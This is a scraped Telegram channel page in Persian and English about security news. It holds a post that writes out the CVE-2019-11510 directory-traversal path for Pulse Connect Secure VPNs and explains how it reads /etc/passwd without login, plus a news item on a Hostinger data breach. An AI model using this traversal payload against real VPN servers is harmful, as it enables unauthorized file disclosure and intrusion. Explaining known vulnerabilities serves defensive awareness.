امنیت اطلاعات – Telegram
امنیت اطلاعات
867 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://news.1rj.ru/str/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
pulse secure directory traversal bug explained-

/dana-na/ <- "na" means "no authentication", urls not starting with this require login

".." <- duh

"/dana/html5acc/guacamole/" <- if this appears in URL *path*, disables code that would normally check file extension



#pulse
#vpn
#exploit


@sec_nerd
افشای اطلاعات کاربران hostinger

طبق اطلاعیه منتشر شده از سوی hostinger ،‌آسیب پذیری موجود در API این شرکت باعث لو رفتن اطلاعات نزدیک به ۱۴ میلیون کاربر شده است که در واکنش به این اتفاق، هاستینگر مجبور به ریست کردن پسورد تمامی کاربران شده.



https://www.hostinger.com/blog/security-incident-what-you-need-to-know/



#news
#breach


@sec_nerd